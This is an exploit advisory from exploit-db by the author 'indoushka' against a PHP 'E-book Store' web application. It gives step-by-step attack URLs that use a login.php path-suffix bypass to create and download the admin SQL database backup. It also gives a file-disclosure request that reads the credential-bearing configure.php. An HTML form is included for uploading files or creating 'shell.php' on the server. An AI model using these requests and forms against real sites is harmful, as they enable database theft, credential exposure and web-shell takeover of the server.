E-book Store – Multiple Vulnerabilities

  • 作者: indoushka
    日期: 2010-06-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12857/
  • ========================================================================================
    | # Title: E-book Store Mullti Vulnerability 
    | # Author : indoushka 
    | # email: indoushka@hotmail.com 
    | # Home : www.iqs3cur1ty.com 
    | # Web Site : http://dl.p30vel.ir/
    | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) 
    | # Bug: Mullti 
    ======================Exploit By indoushka =================================
    # Exploit:
    
    1- Backup Dump
    
    http://localhost/ebookstore/admin/backups/ (2 Find Backup File)
    
    2- If you don't find a buckup stor thisis how to Creat And Download Backup fil SQl
    
    http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backup
    
    http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backupnow
    
    to download buckup :http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=download&file=db_ebookstore-20100301222138.sql
    
    db_ebookstore-20100301222138.sql chang it to the name of the backup and download it with opera 10.10 + Mozilla Firefox Or IDM
    
    ================================================================== 
    # E-book Store (File Disclosure) Vulnerabilities 
    ======================================================================= 
    
    ######################################################################## 
    # Vendor: http://dl.p30vel.ir/
    # Date: 2010-05-27 
    # Author : indoushka 
    # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
    # Contact : indoushka@hotmail.com 
    # Home : www.arab-blackhat.co.cc
    # Dork : n/0
    # Bug: File Disclosure 
    # Tested on : windows SP2 Français V.(Pnx2 2.0) 
    ######################################################################## 
    
    # Exploit By indoushka 
    # File Disclosure : 
    
    in : admin/file_manager.php/login.php?action=download&filename= 
    
    Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php 
    
    Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php 
    
    ======================================================================= 
    # E-book Store (Remote File Upload) Vulnerabilities 
    =======================================================================
    
    ######################################################################## 
    # Vendor: http://dl.p30vel.ir/
    # Date: 2010-05-27 
    # Author : indoushka 
    # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
    # Contact : indoushka@hotmail.com 
    # Home : www.arab-blackhat.co.cc
    # Dork : n/0
    # Bug: Remote File Upload 
    # Tested on : windows SP2 Français V.(Pnx2 2.0) 
    ######################################################################## 
    
    # Exploit By indoushka 
    
    <html><head><title> osCSS 1.2.1 - Remote File Upload </title></head> 
    
    <br><br><u>UPLOAD FILE:</u><br> 
    
    <form name="file" action="http://<--CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> 
    
    <input type="file" name="file_1"><br> 
    
    <input name="submit" type="submit" value=" Upload " > 
    
    </form> 
    
    <br><u>CREATE FILE:</u><br> 
    
    <form name="new_file" action="http://<--CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post"> 
    
    FILE NAME:<br> 
    
    <input type="text" name="filename">(ex. shell.php)<br>FILE CONTENTS:<br> 
    
    <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> 
    
    <input name="submit" type="submit" value=" Save " > 
    
    </form> 
    
    </html> 
    
    Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
    Greetz : 
    Exploit-db Team : 
    (loneferret+Exploits+dookie2000ca)
    all my friend :
    His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
    Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
    www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
    ---------------------------------------------------------------------------------------------------------------